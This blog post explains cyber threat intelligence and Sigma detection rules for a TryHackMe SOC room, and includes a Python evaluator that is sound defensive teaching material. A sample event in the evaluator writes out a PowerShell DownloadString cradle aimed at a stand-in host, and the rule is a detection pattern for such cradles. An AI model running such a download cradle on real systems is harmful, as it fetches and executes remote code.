Motasem Hamdan / MasterMinds Group

Using SOC & Threat Intelligence in Cybersecurity | TryHackMe Threat Intelligence for SOC

May 13, 2024

In this post, we cover the concept of threat intelligence, how it is performed, which IOCs are collected during threat intelligence, and how they are used and standardised so they can be implemented in a SOC to hunt for threats and prevent future cyber attacks. This video is part of the TryHackMe Threat Intelligence for SOC room, which is part of the SOC Level 2 path.

Full blog post is here.

Definition of cyber threat intelligence

From the blue team's perspective, it is the collection and analysis of the tactics, techniques and procedures (TTPs) used by attackers in order to build detections.
From the red team's perspective, it is the emulation of adversaries' TTPs and the analysis of the blue team's ability to build detections based on IOCs and TTPs.

The red team collects the TTPs attributed to a particular hacking group from threat intelligence frameworks, then builds tooling and emulates that group's behaviour during an engagement.

Cyber threat intelligence aims to answer the following questions:

  • Who’s attacking you?

  • What are their motivations?

  • What are their capabilities?

  • What artefacts and indicators of compromise (IOCs) should you look out for?

Classifications of threat intelligence

  • Strategic Intel: High-level intel that looks into the organisation’s threat landscape and maps out the risk areas based on trends, patterns and emerging threats that may impact business decisions.

  • Technical Intel: Examines evidence and artefacts of attacks an adversary uses. Incident Response teams can use this intel to create a baseline attack surface to analyse and develop defence mechanisms.

  • Tactical Intel: Assesses adversaries’ tactics, techniques, and procedures (TTPs). This intel can strengthen security controls and address vulnerabilities through real-time investigations.

  • Operational Intel: Assesses an adversary’s specific motives and intent to perform an attack. Security teams may use this intel to understand the critical assets available in the organisation (people, processes, and technologies) that threat actors may target.

How is threat intelligence gathered?

  • Internal:

      • Vulnerability assessments and incident response reports.

      • Cyber awareness training reports.

      • System logs and events.

  • Community:

      • Web forums.

      • Dark web communities for cybercriminals.

  • External:

      • Threat intel feeds (commercial and open-source).

      • Online marketplaces.

      • Public sources, including government data, publications, social media, and financial and industrial assessments.

What are Sigma rules, and what is the role of Sigma in detection engineering?

Sigma is an open-source generic signature language developed to describe log events in a structured format. This allows for quick sharing of detection methods by security analysts.

The Sigma syntax offers a straightforward and powerful framework for expressing detection logic across many log sources: rules can be written for proxy logs, Windows events, application logs, firewall logs, cloud events, Linux audit logs and many other log types.

Sigma provides the vocabulary to spell out detection logic and to attach metadata that is useful when investigating the alerts your rules produce. It also helps you organise your detection rules and share them with colleagues and threat intelligence communities.

Sigma's most useful property is that it is designed to work with whatever search and detection software you already own. Using the Sigma converter tool, rules can be translated into Elastic, Splunk, ArcSight, Carbon Black, Graylog, NetWitness, Humio, CrowdStrike, ElastAlert and many other free and commercial formats. Keeping your rules in Sigma syntax avoids vendor lock-in and lets you reuse the same detection logic for searches during investigations, as a starting point for threat hunting queries, and across other detection systems.
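To show how the detection block of a Sigma rule turns into matches over log events, here is an added example (not code from the TryHackMe room or from the Sigma project): a small Python evaluator that runs a constructed rule, written as a dict mirroring Sigma's YAML layout (selections with field modifiers plus a condition), over constructed Sysmon-style process-creation events. The rule content, field names, user names and command lines are all assumptions made for the example.

```python
import re

# Constructed rule laid out like a Sigma YAML rule: title, logsource, named selections, condition.
RULE = {
    "title": "PowerShell download cradle (constructed example)",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {"Image|endswith": "\\powershell.exe",
                      "CommandLine|contains": ["DownloadString", "Invoke-WebRequest"]},
        "filter": {"User": "CORP\\svc_patching"},  # constructed: a known patching job
        "condition": "selection and not filter"}}

def field_matches(value, spec, mods):  # one event field vs. one rule value; a list is OR-ed unless |all is set
    value = "" if value is None else str(value).lower()
    def one(t):
        t = str(t).lower()
        return t in value if "contains" in mods else value.endswith(t) if "endswith" in mods else value == t
    hits = list(map(one, spec if isinstance(spec, list) else [spec]))
    return all(hits) if "all" in mods else any(hits)

def selection_matches(selection, event):  # Sigma ANDs every field of a selection; 'Field|mod' keys carry modifiers
    return all(field_matches(event.get(k.split("|")[0]), v, k.split("|")[1:]) for k, v in selection.items())

def eval_condition(cond, res):
    """Selection names joined by and/or/not, with parentheses; 'and' binds tighter than 'or'."""
    toks = re.findall(r"\(|\)|\w+", cond)
    def atom():
        t = toks.pop(0)
        if t == "(": v = expr(); toks.pop(0); return v   # pop the closing ')'
        return not atom() if t == "not" else res[t]
    def term():
        v = atom()
        while toks and toks[0] == "and":
            toks.pop(0); v = atom() and v
        return v
    def expr():
        v = term()
        while toks and toks[0] == "or":
            toks.pop(0); v = term() or v
        return v
    return expr()

def run_rule(rule, events):
    """Return the events the rule fires on: evaluate each named selection, then the condition."""
    det = rule["detection"]
    return [ev for ev in events if eval_condition(det["condition"],
            {n: selection_matches(s, ev) for n, s in det.items() if n != "condition"})]

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"   # constructed Sysmon-style events below
EVENTS = [
    {"Image": PS, "User": "CORP\\jdoe", "CommandLine": "powershell -c (New-Object Net.WebClient).DownloadString('http://x.invalid/a')"},
    {"Image": "C:\\Windows\\System32\\cmd.exe", "User": "CORP\\jdoe", "CommandLine": "cmd /c whoami"},
    {"Image": PS, "User": "CORP\\svc_patching", "CommandLine": "powershell -c Invoke-WebRequest -Uri https://updates.invalid/m.json"}]
```

`run_rule(RULE, EVENTS)` returns only the first event: the second never matches the selection, and the third matches it but is suppressed by the filter, which is exactly how a Sigma `selection and not filter` condition is meant to cut known-good noise.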

Room Answers | TryHackMe Threat Intelligence for SOC

Room answers can be found here.

Video Walkthrough
